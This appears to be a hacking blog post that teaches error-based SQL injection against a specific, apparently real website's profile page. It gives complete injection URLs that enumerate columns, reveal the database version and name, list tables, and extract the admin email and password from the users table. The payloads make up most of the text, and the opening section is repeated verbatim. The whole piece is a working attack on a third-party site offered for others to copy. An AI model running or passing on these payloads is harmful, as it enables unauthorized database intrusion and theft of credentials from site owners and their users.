hello proleets TooL kit here today i gonna teach you how we can hack inject website using sqli error quires so lets start in the name of Allah ,
First of all we need Vulnerability site here is one
http://www.socialwahines.com/profile.php?userid=1930
Or Latest HackBar
Now how we can check this website sqli Error yes or no
=> Simply find order
http://www.socialwahines.com/profile.php?userid=1930 order by 1--+-(No Error)
http://www.socialwahines.com/profile.php?userid=1930 order by 2--+-(No Error)
http://www.socialwahines.com/profile.php?userid=1930 order by 3--+-(No Error)
http://www.socialwahines.com/profile.php?userid=1930 order by 4--+-(No Error)
http://www.socialwahines.com/profile.php?userid=1930 order by 5--+-(No Error)
http://www.socialwahines.com/profile.php?userid=1930 order by 6--+-(No Error)
http://www.socialwahines.com/profile.php?userid=1930 order by 7--+- (Error)
now you can see this when we try to find table number using union select statement we got error see in screen shorts
First of all we need Vulnerability site here is one
http://www.socialwahines.com/profile.php?userid=1930
Or Latest HackBar
Now how we can check this website sqli Error yes or no
=> Simply find order
http://www.socialwahines.com/profile.php?userid=1930 order by 1--+-(No Error)
http://www.socialwahines.com/profile.php?userid=1930 order by 2--+-(No Error)
http://www.socialwahines.com/profile.php?userid=1930 order by 3--+-(No Error)
http://www.socialwahines.com/profile.php?userid=1930 order by 4--+-(No Error)
http://www.socialwahines.com/profile.php?userid=1930 order by 5--+-(No Error)
http://www.socialwahines.com/profile.php?userid=1930 order by 6--+-(No Error)
http://www.socialwahines.com/profile.php?userid=1930 order by 7--+- (Error)
now you can see this when we try to find table number using union select statement we got error see in screen shorts
its mean this website sqli error Don't worry we can inject this using sqli error quires
if you used Latest hackbar go to Error/Double Quires and select sqli error get version
Now use this quires For Get Version :
http://www.socialwahines.com/profile.php?userid=1930 +OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1
You can see this we got Version :D
Now we need Database for database use this Quires
http://www.socialwahines.com/profile.php?userid=1930 +AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
Got database ;)
NOw its time to find tables for table follow me
=> go to Error/Double Quires => Click Get Tables => Enter database name ;) like this
For table use this quires :
http://www.socialwahines.com/profile.php?userid=1930 +AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=0x73775f736f6369616c776168696e6573+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
NOw change limit of find user table like LIMIT 0,1 to 1,1 1,2 ,13 and so on
we got user data next find clolumns same method
For columns use :
Once again change limit or find admin Email or Password
For email
For password
Now we need admin user Data for Email data use this quires
http://www.socialwahines.com/profile.php?userid=1930 +AND(SELECT+1+FROM(SELECT+count(*),CONCAT((SELECT+(SELECT+(SELECT+CONCAT(0x7e,0x27,cast(email+AS+CHAR),0x27,0x7e)+FROM+users+LIMIT+0,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
Got email need password for password use this quires
http://www.socialwahines.com/profile.php?userid=1930 +AND(SELECT+1+FROM(SELECT+count(*),CONCAT((SELECT+(SELECT+(SELECT+CONCAT(0x7e,0x27,cast(password+AS+CHAR),0x27,0x7e)+FROM+users+LIMIT+0,1))+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)+AND+1=1
Got admin password :D
i hope you like this if you want any tutorials about sqli request me i will uploaded
0 comments:
Post a Comment